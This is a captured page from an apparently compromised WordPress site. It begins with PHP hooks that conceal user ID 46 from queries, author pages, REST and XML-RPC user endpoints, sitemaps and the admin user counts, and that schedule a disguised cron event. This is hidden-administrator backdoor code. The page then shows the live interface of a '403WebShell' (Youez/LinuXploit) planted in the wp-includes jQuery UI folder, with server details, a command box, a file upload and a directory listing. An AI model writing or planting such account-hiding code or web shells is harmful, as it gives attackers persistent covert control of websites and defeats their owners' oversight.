add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 198.100.159.156  /  Your IP : 216.73.216.172
Web Server : Apache/2
System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
User : optivie ( 1187)
PHP Version : 7.4.33
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/optivie/domains/optivie.com/public_html/wp-includes/js/jquery/ui/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 30 2026 09:31:27
1187 / optivie
0755
.htaccess
0.231 KB
July 30 2026 09:31:27
1187 / optivie
0555
accordion.js
15.76 KB
July 25 2026 22:20:46
1187 / optivie
0644
accordion.min.js
8.652 KB
July 25 2026 22:20:46
1187 / optivie
0644
autocomplete.js
17.119 KB
July 25 2026 22:20:46
1187 / optivie
0644
autocomplete.min.js
8.336 KB
July 25 2026 22:20:46
1187 / optivie
0644
button.js
11.432 KB
July 25 2026 22:20:46
1187 / optivie
0644
button.min.js
6.01 KB
July 25 2026 22:20:46
1187 / optivie
0644
checkboxradio.js
7.411 KB
July 25 2026 22:20:46
1187 / optivie
0644
checkboxradio.min.js
4.246 KB
July 25 2026 22:20:46
1187 / optivie
0644
controlgroup.js
8.424 KB
July 25 2026 22:20:46
1187 / optivie
0644
controlgroup.min.js
4.299 KB
July 25 2026 22:20:46
1187 / optivie
0644
core.js
48.719 KB
July 25 2026 22:20:46
1187 / optivie
0644
core.min.js
20.961 KB
July 25 2026 22:20:46
1187 / optivie
0644
datepicker.js
80.589 KB
July 25 2026 22:20:46
1187 / optivie
0644
datepicker.min.js
35.887 KB
July 25 2026 22:20:46
1187 / optivie
0644
dialog.js
23.336 KB
July 25 2026 22:20:46
1187 / optivie
0644
dialog.min.js
12.791 KB
July 25 2026 22:20:46
1187 / optivie
0644
draggable.js
34.713 KB
July 25 2026 22:20:46
1187 / optivie
0644
draggable.min.js
17.988 KB
July 25 2026 22:20:46
1187 / optivie
0644
droppable.js
12.597 KB
July 25 2026 22:20:46
1187 / optivie
0644
droppable.min.js
6.509 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-blind.js
1.605 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-blind.min.js
0.859 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-bounce.js
2.598 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-bounce.min.js
0.968 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-clip.js
1.54 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-clip.min.js
0.777 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-drop.js
1.558 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-drop.min.js
0.735 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-explode.js
2.855 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-explode.min.js
1.096 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-fade.js
0.945 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-fade.min.js
0.513 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-fold.js
2.134 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-fold.min.js
0.996 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-highlight.js
1.214 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-highlight.min.js
0.633 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-puff.js
0.972 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-puff.min.js
0.498 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-pulsate.js
1.53 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-pulsate.min.js
0.672 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-scale.js
1.341 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-scale.min.js
0.706 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-shake.js
1.84 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-shake.min.js
0.826 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-size.js
5.291 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-size.min.js
2.433 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-slide.js
1.921 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-slide.min.js
0.896 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-transfer.js
0.867 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect-transfer.min.js
0.432 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect.js
24.036 KB
July 25 2026 22:20:46
1187 / optivie
0644
effect.min.js
10.09 KB
July 25 2026 22:20:46
1187 / optivie
0644
menu.js
18.516 KB
July 25 2026 22:20:46
1187 / optivie
0644
menu.min.js
9.96 KB
July 25 2026 22:20:46
1187 / optivie
0644
mouse.js
6.081 KB
July 25 2026 22:20:46
1187 / optivie
0644
mouse.min.js
3.348 KB
July 25 2026 22:20:46
1187 / optivie
0644
progressbar.js
4.14 KB
July 25 2026 22:20:46
1187 / optivie
0644
progressbar.min.js
2.498 KB
July 25 2026 22:20:46
1187 / optivie
0644
resizable.js
29.775 KB
July 25 2026 22:20:46
1187 / optivie
0644
resizable.min.js
18.383 KB
July 25 2026 22:20:46
1187 / optivie
0644
selectable.js
7.938 KB
July 25 2026 22:20:46
1187 / optivie
0644
selectable.min.js
4.4 KB
July 25 2026 22:20:46
1187 / optivie
0644
selectmenu.js
15.963 KB
July 25 2026 22:20:46
1187 / optivie
0644
selectmenu.min.js
9.279 KB
July 25 2026 22:20:46
1187 / optivie
0644
slider.js
19.14 KB
July 25 2026 22:20:46
1187 / optivie
0644
slider.min.js
10.507 KB
July 25 2026 22:20:46
1187 / optivie
0644
sortable.js
46.524 KB
July 25 2026 22:20:46
1187 / optivie
0644
sortable.min.js
24.906 KB
July 25 2026 22:20:46
1187 / optivie
0644
spinner.js
14.096 KB
July 25 2026 22:20:46
1187 / optivie
0644
spinner.min.js
7.496 KB
July 25 2026 22:20:46
1187 / optivie
0644
tabs.js
23.109 KB
July 25 2026 22:20:46
1187 / optivie
0644
tabs.min.js
11.727 KB
July 25 2026 22:20:46
1187 / optivie
0644
tooltip.js
14.137 KB
July 25 2026 22:20:46
1187 / optivie
0644
tooltip.min.js
6.098 KB
July 25 2026 22:20:46
1187 / optivie
0644

Youez - 2016 - github.com/yon3zu
LinuXploit